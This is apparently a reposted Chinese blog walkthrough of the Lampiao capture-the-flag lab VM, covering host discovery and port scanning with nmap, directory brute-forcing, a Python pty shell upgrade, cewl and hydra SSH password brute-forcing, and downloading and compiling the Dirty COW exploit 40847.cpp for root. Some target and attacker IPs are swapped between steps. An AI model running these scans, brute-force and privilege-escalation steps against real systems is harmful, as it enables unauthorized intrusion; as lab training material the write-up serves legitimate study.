Lampiao靶场-dirtycow漏洞利用

这篇具有很好参考价值的文章主要介绍了Lampiao靶场-dirtycow漏洞利用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Lampiao靶场-dirtycow漏洞利用

目录
  • Lampiao靶场-dirtycow漏洞利用
    • 一、主机发现
    • 二、端口扫描
    • 三、目录遍历
    • 四、拿到webshell
    • 五、实现交互式shell
    • 六、暴力破解
    • 七、把dirtycow脚本传到靶机
    • 八、编译运行dirtycow脚本

只是简单记录一下所用工具

机器信息:

靶机:192.168.142.132

攻击机:192.168.142.133

一、主机发现

nmap -sP 192.168.142.0/24

需要自己判断一下,哪台是靶机。

二、端口扫描

nmap -A -p- 192.168.142.132

进行端口扫描,获取端口信息,发现有22、80、1898端口开放

三、目录遍历

目录遍历可以使用dirb或者dirsearch工具

dirb http://192.168.142.133:1898

python3 dirsearch.py -u http://192.168.142.133:1898

个人感觉dirsearch比较速度更快

四、拿到webshell

这里就不写了,网上太多了。

五、实现交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

其他方式参考大佬的文章,发现好东西就分享,我就不复制粘贴了。

https://saucer-man.com/information_security/233.html

六、暴力破解

因为有22端口,存在爆破的可能性,先收集一下网站信息做一个字典

cewl http://192.168.142.133:1898 -w lampiao.txt

用hydra进行ssh的暴力破解

hydra -l tiago -P lampiao.txt 192.168.142.133 ssh

补充:

-l后面加用户名,拿到交互式shell后可以查询一下/etc/passwd文件,自然可以拿到用户名。前期是拿不到其他用户名的,发现22端口开放也只能爆破root。

如果直接爆破root成功,恭喜你游戏结束。

七、把dirtycow脚本传到靶机

1、用python开启http服务

在攻击机上用python开启一个端口为3333的http服务

python -m http.server 3333

靶机用wget下载dirtycow脚本,当然有一些细节,需要自己去思考。

wget http://192.168.142.133:3333/40847.cpp

2、ssh服务传输文件

参考资料:

https://zhuanlan.zhihu.com/p/507876254

攻击机上运行:

rsync 40847.cpp tiago@192.168.142.132:/home/tiago

或者

靶机上运行:

rsync root@192.168.142.132:/root/桌面/40847.cpp .(.是代表当前路径)

八、编译运行dirtycow脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

  1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  4. -std=c++11就是用按C++2011标准来编译的
  5. -pthread 在Linux中要用到多线程时,需要链接pthread库
  6. -o dcow gcc生成的目标文件,名字为dcow

参考资料:

https://blog.csdn.net/weixin_43715506/article/details/113410027

https://blog.csdn.net/qq_42967398/article/details/102536576文章来源地址https://www.toymoban.com/news/detail-410671.html

到了这里,关于Lampiao靶场-dirtycow漏洞利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Shiro反序列化漏洞(CVE-2016-4437)+docker靶场+工具利用

    将java对象转换为字节序列(json/xml)的过程叫序列化,将字节序列(json/xml)恢复为java对象的过程称为反序列化。 Shiro框架提供了“记住我”的功能,用户登陆成功后会生成经过加密并编码的cookie,cookie的key为RememberMe,cookie的值是经过序列化的,使用AES加密,再使用base64编码

    2024年02月16日
    浏览(43)
  • Linux脏牛提权漏洞复现(DirtyCow)

    脏牛(DirtyCow)是Linux中的一个提权漏洞。主要产生的原因是Linux系统的内核中Copy-on-Write(COW)机制产生的竞争条件问题导致,攻击者可以破坏私有只读内存映射,并提升为本地管理员权限。 靶机:vulnhub——Lampiao 192.168.230.217 攻击机:Kali 192.168.230.128 1、对 192.168.230.0/24 这一个

    2024年03月21日
    浏览(50)
  • 漏洞靶场——DVWA+命令执行漏洞

    DVWA是OWASP官方编写的PHP网站,包含了各种网站常见漏洞 DVWA搭建环境: PHP环境+DVWA源代码 https://github.com/digininja/DVWA/archive/master.zip 安装phpstudy 命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。 命令连接符 :

    2024年02月06日
    浏览(65)
  • 命令执行漏洞--ibos靶场(靶场环境是掌控安全的)

    命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种 ctrl+u:在view-source模式自动换行 危险函数 1. system()函数:直接执行命令,并且输出 2. exec()函数:默认显示最后一行结果,没有输出 3. shell_exec()函数:多行结果,没有输出 4. pa

    2024年04月16日
    浏览(37)
  • csrf漏洞之DedeCMS靶场漏洞(超详细)

    1.Csrf漏洞: 第一步,查找插入点,我选择了网站栏目管理的先秦两汉作为插入点 第二步修改栏目名称 第三步用burp拦截包 第四步生成php脚本代码 第五步点击submit 第六步提交显示修改成功 第二个csrf 步骤与上述类似 红色边框里面的数字会随着刷新而变化,由此可知存在toke

    2024年01月23日
    浏览(48)
  • Web安全:WebGoat || VulApps 靶场搭建( 靶场漏洞测试和练习)

    WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、

    2024年02月12日
    浏览(52)
  • Web渗透漏洞靶场收集

    “如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。 初学的时候玩靶场会很有意思,可以练习各种思路和技巧,用来检测扫描器的效果也是很好的选择。今天,我们来数数那些

    2024年02月07日
    浏览(36)
  • Vulhub漏洞靶场搭建

    Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 物理机:Windows 10 虚拟机:Centos 7 192.168.1.13 ,网卡设置为NAT模式 安装Docker 安装Docker

    2024年02月11日
    浏览(48)
  • DVWA靶场-文件上传漏洞

           文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 basename(str,name)       函数返回路

    2024年02月07日
    浏览(37)
  • 【网络安全 --- 任意文件上传漏洞靶场闯关 6-15关】任意文件上传漏洞靶场闯关,让你更深入了解文件上传漏洞以及绕过方式方法,思路技巧

      首先分享一个自己做的很不错的网路安全笔记,内容详细介绍了许多知识 超详细的网络安全笔记 分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记​编辑https://m.tb.cn/h.5JdFcih?tk=OuVrWRl9vMx%20CZ3457 https://m.tb.cn/

    2024年02月07日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包